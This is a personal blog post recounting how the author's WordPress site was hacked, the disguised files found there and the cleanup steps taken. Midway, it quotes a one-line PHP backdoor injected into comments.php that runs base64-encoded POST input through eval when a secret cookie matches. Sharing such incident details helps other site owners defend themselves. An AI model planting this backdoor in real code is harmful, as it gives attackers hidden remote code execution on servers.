(As if the hacking didn’t bring enough misery for me, my site’s page rank also dropped a week after I changed themes. Must there be something in that custom theme I made a year and a half ago?)
Anyway, getting back to the topic, imagine finding an almost familiar but strange file called functions_php.php among your top-level WordPress scripts. Your curiosity strikes and you decide to access the file from the web and you got this:
Imagine the horror you felt when you learned that such alien facility virtually enables almost everyone to access and modify your server files. Also imagine how long that strange file has been residing in your server, perfectly disguised among your CMS scripts.
Having been a web hosting consumer for the past 5 years, I know how it feels when the security of my 5-year old files is breached. I almost panicked and that spoiled my weekend promise to F.
I looked further for irregularities within my server files. The recurring error that knocked my server’s load was something from within the php scripts and not specifically that alien facility I mentioned earlier.
Furthermore, I also sought Google’s help for instances of similar incidents in other websites. I found this one. My initial hypothesis was right. It’s some hacker(s)’ doing. Immediately, I informed my host through SMS, and I was told to secure my passwords, etc.
When I looked for more search results, relating “WordPress” to “hacking”, I found this WordPress Philippines article. Exactly the one I’m looking for. Digging beyond the article’s links I also found two more articles that somehow relieved me of the anxiety, knowing mine’s not an isolated case.
{from bloggerguide.net}
{from ocaoimh.ie}
Indeed, as detailed in the links mentioned above, I found even stranger files in my account. Files with .pngg, .giff, and .jpegg extensions. I thought eliminating this would relieve my site of the hacker’s doings. I was wrong, even some of my .php files (comments.php) have been injected with some bastard codes:
<php if(md5($_COOKIE['_wp_debugger'])==”4afbe89ffaab79a9d54c4048322899b9″){ eval(base64_decode($_POST['file'])); exit; } ?>
What do I do with the tens and even hundreds of possibly infected files? (I just realized now that I’ve been in a similar predicament 6 years ago or so when my HTML files were infected by the Mythical HTML Redlof.A virus™. ;^^)
Thoughts of purging my server crossed my mind as a last resort. If I can’t clean them up, it’s easier to just delete all of them then restore a clean back up later on. But the problem is… I don’t keep backups of my server files! Or if I did, they’re hidden within my archaic CD archives. 
(Edit: I found my June January 2008 backup! And already restored some sub-domains.)
Some lesson I had to learn.
When I finally gathered my wits, I had no choice but to perform the following steps:
- Downloaded a current backup of my server files (on its “infected” state)
- Read the articles related to the incident and took their tips, suggestions, etc.
- Disabled all WP plugins
- Upgraded my WP2.2 to WP2.5.1
- Following the helpful articles’ suggestions, I hunted for the possible infected files from the backup (in my computer)
- After finding the files (mostly plugin/theme/image files) from the downloaded backup in my computer, I deleted them one-by-one from the remote server
- Inspected my database and removed all traces of the hacking incident (as suggested by the articles)
- Changed all of my passwords (domain, DB, WordPress, etc.) - At this point, I was somehow confident I’ve cleaned up all of my sever files.
(If you’re experiencing a similar incident as mine, I suggest that you go directly to the links I stated.)
To date, I’m still monitoring my files and I suspect that it’s still not free of hacking traces. There could still be some files I haven’t cleaned up. But at least the host’s CPU is no longer complaining (for now, at least).
